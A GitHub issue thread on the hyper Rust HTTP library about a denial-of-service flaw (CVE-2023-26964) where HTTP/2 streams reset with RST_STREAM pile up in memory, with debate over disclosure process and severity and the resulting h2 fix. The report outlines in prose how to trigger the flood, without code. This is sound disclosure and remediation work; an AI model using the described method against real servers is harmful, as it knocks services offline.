-
-
Notifications
You must be signed in to change notification settings - Fork 1.6k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Stream stacking occurs when H2 processes HTTP2 RST_STREAM frames. As a result, the memory and CPU usage are high. #2877
Comments
@seanmonstar What do you think of this issue? I think hyper has some problems in dealing with this scenario. |
Sounds like something we could try to fix. What is making the slab hold onto the memory? My guess is that it needs to hold the stream info while there is an |
@silence-coding thanks for your code. |
This comment was marked as off-topic.
This comment was marked as off-topic.
GH Dependabot is now also raising a Security alert |
Is there anything we could do as reqwest library users to mitigate the attack surface? |
Um. Ok. I'm sure you just wanted to see this fixed. But this is NOT how to do things. Filing a drive-by CVE like this is like seeing a lighter in a school and pulling the fire alarm. There is a SECURITY policy if you ever feel something is a vulnerability. Then we can better coordinate. Be Kind. That includes considering we're all humans contributing, and respecting time is part of being kind. I'm also extremely disappointed that @github facilitated this. That said, fire alarm time. If you're here from a dependabot warning, or similar: I'll be working on this today. I will update this issue when there is a version you can upgrade to. Some things you can do to determine if you can just safely ignore the dependabot warning:
The fix will likely be an |
This CVE is going to cause a flurry of unnecessary emergency response work across the ecosystem--even for use cases that are totally un-impacted by the bug. Every application that depends on Hyper is now going to have to ship out-of-cycle fixes to address the CVE, even if the application has nothing to do with HTTP/2. Going through the documented SECURITY process isn't a feel good exercise: it allows stakeholders to coordinate about the severity and breadth of an issue's impact. |
Not to pile on @github's security team, the actual CVE is "better" insofar as it says "awaiting analysis"... The GH Security Advisory, in contrast, is unnecessarily alarming with its High Severity label... |
An update: from what I can tell, the report is that the slab store of streams grows because its holding two events, It appears that as long as the server is accepting requests, the slab is actually cleared out. Looking in the original report, I can't find what the server is doing (it's Also, here's the chat thread for this: https://discord.com/channels/500028886025895936/1095696565689122967 |
What do you mean with "unnecessary"? Finding out whether or not you are affected isn't unnecessary. Updating to an unaffected version is not possible, because there is no unaffected version as of now; every version of hyper is potentially vulnerable. The only thing people can do is to disable the "h2" feature if they have it enabled, which would prevent this attack. |
The whole point of a SECURITY policy is to respond in a reasonable way - reproduce identify scope, write tests, prepare fix, etc. Should we really report a CVE before confirming with the maintainers that it's 1. reproducible and 2. something that has an available fix ready to deploy? It would have been better to follow the requested SECURITY policy so that the response can be more coordinated. It's better to be sure first before declaring a vulnerability. |
Exactly; additionally, there is no world in which this is a "high severity" CVE. You can use this tool to calculate the severity. |
This comment was marked as abuse.
This comment was marked as abuse.
It is still very unclear whether there is a vulnerability or an issue. The submitter claims there is one but needs to provide a report by which they achieved that result. The maintainers have yet to reproduce under normal conditions. The only way to reproduce seems to be either a) misusing |
We don't even have an official repro case. That's the entire point of the |
Does the issue not show how to reproduce this. I'm sorry but I don't exactly blame the person who made the CVE here. This was reported and was marked as moderate on the CVE website. I can't imagine it's that rare of a situation for people to use http2 streams here, so I don't know why it's being minimized so much. Be kind should also apply to not scolding your community members. I'm sure this wasn't meant out of malice and was simply meant to bring awareness to the issue at hand. That being said, i'm seeing people refer to it being marked as high severity, but both github and nist are reporting as moderate, which I think is fair. |
GitHub initially had it marked as high. It was updated an hour ago |
No, it looks like the maintainers/contributors were having a hard time figuring out exactly how to reproduce it/where the vulnerability is, or if it's just an API misuse. As I understand from the fire alarm discord thread, the large number of requests needed to reproduce in OPs case also confuse it. In general it's not very clear how/where the vulnerability lies. and this is emergency work that the maintainers now have to perform, without even a super concise repro case, instead of it being disclosed properly. It's generally good practice to at least mention to the maintainer that you'll be filing a CVE, even if just to give advance warning, but also just to see if you are misunderstanding it. Even if it turns out to be severe, it's still best practice to communicate with maintainers about it for all of the reasons above. |
It unfortunately does not. About 4 people have been working on this all day trying to figure out what the actual reproduction of this is. This makes it quite stressful to just guess at what a fix is, when we can't confirm that's what they meant in the first place.
I acknowledged in my first comment this morning that I assume the person just wanted it fixed, not assuming they were being evil. But this is not the right way to get attention. There were several more steps that could have been taken. |
Another update, this should be classified as low severity. The attack requires sufficient bandwidth to overload Hyper's accept loop. The original submitter 400 threads over localhost against hyper's 1 thread. This would not be easy to trigger over a network (though possible). Additionally, systems return to normal once the attack completes. In practice, I don't expect many to be vulnerable to such an attack due to the difficulty of triggering it via remote network and in terms of severity, a botnet attack triggering a DOS by overloading the pipe would be a greater risk. That said, the Hyper maintainers are currently investigating a patch that could mitigate this specific attack. |
This comment was marked as off-topic.
This comment was marked as off-topic.
This comment was marked as off-topic.
This comment was marked as off-topic.
This is all very good to know, nice work. Just one question: why is it not easy to trigger 400 client threads over the network against 1 server thread? Seems dead simple and is what every ddos framework can do, no? Am I misinterpreting your answer maybe? Thanks for all the work from everyone involved again! It's appreciated! |
It isn't a matter of threading, but of bandwidth. You can only send so many bytes as the pipe allows, snd that has to be enough to saturate the hyper accept loop. This is easy enough to do over localhost, where bandwidth is arbitrarily high, not so much over the public internet |
This is our current theory (can't confirm it's what the original reporter meant): if you can flood the network faster than the server is able to "accept" requests, the queue of pending-to-accept-but-reset requests can keep growing. This is because the accept method is basically So, if it is over the network, not local, then latency, backpressure, and TCP flow control would make it harder to fill up the server's buffer faster than it can spawn a task to handle the request. But again, this is just our best guess. |
If that is indeed the issue, this PR means to fix it: hyperium/h2#668 |
The PR seems close. But, given that I've been at this for 14 hours, I'm going to go knock out. Comparing the severity with the possibility of breaking something just before being unresponsive, it doesn't seem worth publishing right at this moment. |
Streams that have been received by the peer, but not accepted by the user, can also receive a RST_STREAM. This is a legitimate pattern: one could send a request and then shortly after, realize it is not needed, sending a CANCEL. However, since those streams are now "closed", they don't count towards the max concurrent streams. So, they will sit in the accept queue, using memory. In most cases, the user is calling `accept` in a loop, and they can accept requests that have been reset fast enough that this isn't an issue in practice. But if the peer is able to flood the network faster than the server accept loop can run (simply accepting, not processing requests; that tends to happen in a separate task), the memory could grow. So, this introduces a maximum count for streams in the pending-accept but remotely-reset state. If the maximum is reached, a GOAWAY frame with the error code of ENHANCE_YOUR_CALM is sent, and the connection marks itself as errored. ref CVE-2023-26964 ref GHSA-f8vr-r385-rh5r Closes hyperium/hyper#2877
Streams that have been received by the peer, but not accepted by the user, can also receive a RST_STREAM. This is a legitimate pattern: one could send a request and then shortly after, realize it is not needed, sending a CANCEL. However, since those streams are now "closed", they don't count towards the max concurrent streams. So, they will sit in the accept queue, using memory. In most cases, the user is calling `accept` in a loop, and they can accept requests that have been reset fast enough that this isn't an issue in practice. But if the peer is able to flood the network faster than the server accept loop can run (simply accepting, not processing requests; that tends to happen in a separate task), the memory could grow. So, this introduces a maximum count for streams in the pending-accept but remotely-reset state. If the maximum is reached, a GOAWAY frame with the error code of ENHANCE_YOUR_CALM is sent, and the connection marks itself as errored. ref CVE-2023-26964 ref GHSA-f8vr-r385-rh5r Closes hyperium/hyper#2877
Release PR is in CI right now: hyperium/h2#670 |
Release is out: https://github.com/hyperium/h2/releases/tag/v0.3.17 You can run a |
submitted rustsec/advisory-db#1684. |
Version
hyper-0.13.7
h2-0.2.4
Platform
wsl
Description
Summary:
Stream stacking occurs when Hyper processes HTTP2 RST_STREAM frames. As a result, the memory and CPU usage are high.
Step:
Send an
HEADERS
frame to open the stream, followed by anRST_STREAM
frame to request cancellation of the streamCreate multiple threads for sending.
Result:
The CPU usage of the Hyper server keeps increasing. As a result, the VM memory is used up.
Vulnerability analysis:
When receiving a
HEADERS
frame, theh2
stores the corresponding stream content in theslab
and sets a frame index to theids
. When receiving anRST_STREAM
frame,h2
sets the stream toClosed
and resets the related statistics. However, the stream memory is released only whenstream.is_released() is true
. When theRST_STREAM
frame is received, the release is not triggered immediately. As a result, the size of the slab increases continuously.Test procedure:
Add the
slab_len()
,ids_len()
method for Store to return the length of all flows and active flows.Add the preceding two stream lengths to the
recv_reset()
method.After the test, when the HEADERS frame is repeatedly sent to open a stream or the RST_STREAM frame is sent to cancel the stream, the length of the ids does not exceed the value of max_recv, but the SLAB increases .The stream in the Closed state in the SLAB is released only after all frames on the connection are sent.
The
max_concurrent_streams
configuration can limitmax_recv_streams
, but it appears that in this scenario, the size ofSlab
is much larger than themax_concurrent_streams
value and stacks up.I think it is necessary to limit the size of the
Slab
or ensure that streams in theSlab
can be released quickly after theRST_STREAM
frame is received to prevent such attacks.The text was updated successfully, but these errors were encountered: